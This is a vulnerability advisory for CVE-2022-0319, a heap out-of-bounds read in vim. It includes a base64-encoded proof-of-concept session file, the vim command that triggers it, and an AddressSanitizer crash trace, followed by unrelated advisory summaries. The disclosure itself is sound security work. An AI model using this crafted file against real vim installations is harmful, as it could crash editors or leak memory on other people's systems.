Headline
CVE-2022-0319: Out-of-bounds Read in vim
Out-of-bounds Read in vim/vim prior to 8.2.
Description
A heap-based OOB read of size 4 occurs when a user tries to open a vim session file specified below. This happens regardless of any command line options that could be specified to restrict vim, such -Z and -m. This bug has been found on default vim build (lastest commit hash fd218c8a36e7ed33f7a205163690c5b7d2f31f8a) on Ubuntu 20.04 for x86_64/amd64.
Proof of Concept
Here is the smallest poc we were able to produce (it is base64 encoded since it contains some unprintable characters):
$ echo -ne "CXdpMDAwMDAwMDA1MDAwMCA1MDAwMDAwMDAwMDAACiAgc2lsIW5vcm0ICAgICAgICBYXDrJPKgNn
eW9leHQgFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBRsa25lCiAgc2lsIW5vcm0ICAgI9/f3
MBYXGLJPKgNneXl5k/95eQEBAgEN/gb/3jABPQGEAQEBAT15eXl5eW1lpmUgZSsgeXlweXl5AXV1
dXV1dXV1enUwdXV1dnV1" | base64 -d > poc
$ vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ':qa!'
=================================================================
==67807==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000016500 at pc 0x7f4e10795f40 bp 0x7fffa0da2520 sp 0x7fffa0da1cc8
READ of size 4 at 0x621000016500 thread T0
#0 0x7f4e10795f3f in __interceptor_memmove (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f)
#1 0x5612382d840a in vim_memsave /home/faraday/vim/src/alloc.c:604
#2 0x561238d26031 in u_save_line /home/faraday/vim/src/undo.c:373
#3 0x561238d4665c in u_saveline /home/faraday/vim/src/undo.c:3477
#4 0x561238d25615 in u_save /home/faraday/vim/src/undo.c:257
#5 0x561238d254a4 in u_save_cursor /home/faraday/vim/src/undo.c:237
#6 0x5612388b83c5 in op_addsub /home/faraday/vim/src/ops.c:2386
#7 0x561238858e66 in nv_addsub /home/faraday/vim/src/normal.c:2302
#8 0x56123884f61f in normal_cmd /home/faraday/vim/src/normal.c:1120
#9 0x5612385ac525 in exec_normal /home/faraday/vim/src/ex_docmd.c:8638
#10 0x5612385ac2e4 in exec_normal_cmd /home/faraday/vim/src/ex_docmd.c:8601
#11 0x5612385ab802 in ex_normal /home/faraday/vim/src/ex_docmd.c:8519
#12 0x56123856dd85 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2573
#13 0x56123856170e in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#14 0x561238addf98 in do_source /home/faraday/vim/src/scriptfile.c:1512
#15 0x561238adaf75 in cmd_source /home/faraday/vim/src/scriptfile.c:1098
#16 0x561238adb132 in ex_source /home/faraday/vim/src/scriptfile.c:1124
#17 0x56123856dd85 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2573
#18 0x56123856170e in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#19 0x56123855f288 in do_cmdline_cmd /home/faraday/vim/src/ex_docmd.c:587
#20 0x56123905a82d in exe_commands /home/faraday/vim/src/main.c:3091
#21 0x56123904c323 in vim_main2 /home/faraday/vim/src/main.c:774
#22 0x56123904b809 in main /home/faraday/vim/src/main.c:426
#23 0x7f4e0ed440b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#24 0x5612382d7cbd in _start (/home/faraday/vim/src/vim+0x1259cbd)
0x621000016500 is located 0 bytes to the right of 4096-byte region [0x621000015500,0x621000016500)
allocated by thread T0 here:
#0 0x7f4e10802bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
#1 0x5612382d817e in lalloc /home/faraday/vim/src/alloc.c:248
#2 0x5612382d7f29 in alloc /home/faraday/vim/src/alloc.c:151
#3 0x561239062c5c in mf_alloc_bhdr /home/faraday/vim/src/memfile.c:884
#4 0x56123905f03c in mf_new /home/faraday/vim/src/memfile.c:376
#5 0x5612387bbbda in ml_new_data /home/faraday/vim/src/memline.c:4077
#6 0x561238798cc5 in ml_open /home/faraday/vim/src/memline.c:394
#7 0x561238304457 in open_buffer /home/faraday/vim/src/buffer.c:185
#8 0x561239059185 in create_windows /home/faraday/vim/src/main.c:2861
#9 0x56123904c02e in vim_main2 /home/faraday/vim/src/main.c:705
#10 0x56123904b809 in main /home/faraday/vim/src/main.c:426
#11 0x7f4e0ed440b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f) in __interceptor_memmove
Shadow bytes around the buggy address:
0x0c427fffac50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffac60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffac70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffac80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffac90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c427fffaca0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffacb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffacc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffacd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427ffface0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffacf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==67807==ABORTING
Impact
This vulnerability is capable disclosing data and might lead to bypass protection mechanisms facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.
Acknowledgements
This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.
Related news
Ubuntu Security Notice 6026-1 - It was discovered that Vim was incorrectly processing Vim buffers. An attacker could possibly use this issue to perform illegal memory access and expose sensitive information. This issue only affected Ubuntu 20.04 LTS. It was discovered that Vim was using freed memory when dealing with regular expressions inside a visual selection. If a user were tricked into opening a specially crafted file, an attacker could crash the application, leading to a denial of service, or possibly achieve code execution with user privileges. This issue only affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.
Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.
Dell VxRail, versions prior to 7.0.410, contain a Container Escape Vulnerability. A local high-privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the container's underlying OS. Exploitation may lead to a system take over by an attacker.
Hello everyone! Great news for my open source Scanvus project! You can now perform vulnerability checks on Linux hosts and docker images not only using the Vulners.com API, but also with the Vulns.io VM API. It’s especially nice that all the code to support the new API was written and contributed by colleagues from Vulns.io. […]
A memory corruption issue existed in the processing of ICC profiles. This issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13. Processing a maliciously crafted image may lead to arbitrary code execution.
Gentoo Linux Security Advisory 202208-32 - Multiple vulnerabilities have been discovered in Vim, the worst of which could result in denial of service. Versions less than 9.0.0060 are affected.
Dell Unity, Dell UnityVSA, and Dell Unity XT versions prior to 5.2.0.0.5.173 contain a plain-text password storage vulnerability when certain off-array tools are run on the system. The credentials of a user with high privileges are stored in plain text. A local malicious user with high privileges may use the exposed password to gain access with the privileges of the compromised user.
Ubuntu Security Notice 5458-1 - It was discovered that Vim was incorrectly handling virtual column position operations, which could result in an out-of-bounds read. An attacker could possibly use this issue to expose sensitive information. It was discovered that Vim was not properly performing bounds checks when updating windows present on a screen, which could result in a heap buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.